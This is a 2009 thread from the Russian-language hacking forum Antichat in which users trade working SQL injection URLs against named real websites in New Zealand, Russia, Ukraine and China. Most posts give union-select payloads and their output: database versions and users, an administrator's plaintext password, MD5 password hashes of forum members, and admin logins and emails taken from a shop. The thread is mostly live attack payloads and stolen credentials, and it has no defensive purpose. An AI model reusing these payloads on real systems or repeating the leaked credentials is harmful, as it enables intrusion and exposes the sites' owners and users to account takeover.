Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.06.2009, 22:15
|
|
Новичок
Регистрация: 20.04.2009
Сообщений: 4
Провел на форуме:
18948
Репутация:
5
|
|
http://www.nzcamping.co.nz/region.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10/*
version: 4.0.27-standard-log
user: nzcampin@202.191.34.7
database: nzcampin
http://www.theatreview.co.nz/reviews/review.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30/*
При попытке узнать версию и т.д. столкнулся с проблемой кодировки, то есть такого содержания >> Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Также пробовал подставить запросы вида
char()
перед union'ом ставил: COLLATE utf8_general_ci и т.д.
Но, увы, так ничего и не вышло, может, у кого нибудь получится раскрутить эту SQL инъекцию.
|
|
|
08.06.2009, 22:21
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Xizor http://forum.antichat.ru/thread104591.html
http://www.theatreview.co.nz/reviews/review.php?id=-1+union+select+1,2,3,4,5,cast(concat_ws(0x3a,Versi on(),database(),user(),@@version_compile_os)+as+bi nary),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30/*
Version : 4.1.15-LOG
Database : THEATREVIEW
User : THEATREVIEW@LOCALHOST
Os : REDHAT-LINUX-GNU
|
|
|
|
09.06.2009, 00:52
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://journals.volunteer.org.nz/entry.php?id=1834+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7+from+user+limit+1,1/*
version():4.0.24_Debian-10sarge3-log
database():journals
user():journals@localhost
Код:
http://journals.volunteer.org.nz/entry.php?id=1834+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7+from+user+limit+1,1/*
Administrator:freedom1
__
Код:
http://www.theatreview.co.nz/reviews/review.php?id=2237++union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a,version(),database(),user()))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+limit+1,1/*
version()4.1.15-LOG
database():THEATREVIEW
user():THEATREVIEW@LOCALHOST
Последний раз редактировалось M.W.N.N.; 09.06.2009 в 01:03..
|
|
|
|
09.06.2009, 01:29
|
|
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309
Репутация:
348
|
|
какойто китайский шоп...
Код:
http://shop.rzxx.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user(),0x7c,version(),0x7c,database()),8/*
rzxxshop@localhost|4.0.25-nt-log|rzxxshop
Код:
http://shop.rzxx.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
admin|e68969db498985f423ece7ba02213c24: bluehut51|bluehtu@163
на сервере стоит WINNT
Safe-mode: ON (secure)
кста на главном сайте PR:4 |
|
|
|
09.06.2009, 03:47
|
|
Участник форума
Регистрация: 01.03.2009
Сообщений: 121
Провел на форуме:
4022236
Репутация:
38
|
|
Харківський національний університет внутрішніх справ 
http://www.univd.edu.ua/index.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 5.0.67-log
Database name: univd
User name: univd@localhost
http://www.univd.edu.ua/index.php?id=-1+union+select+1,table_name,3+from+information_sch ema.tables--
Таблиц огромное количество.
|
|
|
|
09.06.2009, 08:03
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
http://www.abiturcenter.ru/testi/begin.php?log=guest&step=2&sc_id=15+union+select+1 ,concat_ws(0x3a,version(),user(),database()),3,4,5 ,6/*
4.0.27-log:www1@zvm7.host.ru:abiturdb
ТИЦ 1600
|
|
|
|
09.06.2009, 10:42
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.donstroy.info/architectors/demon.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4
donstroy@miami.skif.net:donstroy:4.0.27 |
|
|
|
09.06.2009, 10:47
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,version(),user(), database())
4.1.22:digs_mysql@194.85.95.84:digs_ihtc
на сайте есть форум, phpbb, попробуем обратиться к phpbb_users
http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+phpbb_users
"38" выводится, пробуем вырвать юзеров и пароли
http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,user_id,username, user_password)+from+phpbb_users+limit+1,1
меняем limit...
Код:
-1::Anonymous
2:912cf5e2e231609b0d0fce0f677dc579:newspalm
3:25849d65beb0a2793b2c2d0dd72b84cc:Megabass
4:470671a0ab36f8e7c496312fc794122e:/DiOs
5:421b47ffd946ca083b65cd668c6b17e6:quinine
6:a2c97337264f510aaba2f42f0a58a66f:InReklama
7:8d0c6f638e1326e65c53beba2a41b1eb:Gover
8:7d82c72e13cb1fe7b29b1cba10d468c3:Denis
и т.д.
------------------
http://www.blesna-n.ru/fotoalbum.php?rez=-2+union+select+11111,22222,concat_ws(0x3a,version( ),user(),database())
отображается в ссылке (<A HREF=../pic/big_regats/ 4.1.22:blesnan@tix.hc.ru:wwwblesnanru target="1" или просто посмотреть в статусе при наведении на месте где должна была быть фотка  )
----------------
http://www.clever.saratov.ru/site/photo/index.php?id_parent=2+and+substring(version(),1,1) =5
-----------------
http://www.3eye.ru/screen-info.php?screen=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9
4.0.17:3eye@localhost:3eye
Последний раз редактировалось AlexSatter; 09.06.2009 в 13:07..
|
|
|
|
09.06.2009, 13:28
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
http://www.gmpr.ru
http://www.gmpr.ru/news_item.php?id=-669'+UNION+SELECT+0,1,con cat_Ws(0x0b,user(),version(),database()),3,4,5,6,7 ,8,9+--+
gmpr@localhost
5.0.45-log
gmpr
Логин: 26
Пасс:55
Куда вводить ХЗ ))
http://www.mobilecomm.ru
http://www.mobilecomm.ru/view.php?id=-243'+UNION+SELECT+0,1,2,3,4,concat_ws(0x0b,user(), data base(),version()),6,7+--+
z90196_mobilecom@77.221.130.20
z90196_mobilecom
5.0.32-Debian_7etch4-log
|
|
|
|
09.06.2009, 13:43
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://www.konka.co.nz/productdetail.php?id=33+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*
version():4.1.22-standard-log
database():ncpgroup_konka
user():ncpgroup_konka@localhost
Код:
http://www.konka.co.nz/productdetail.php?id=33+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+users+limit+1,1/*
admin:21232f297a57a5a743894a0e4a801fc3 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
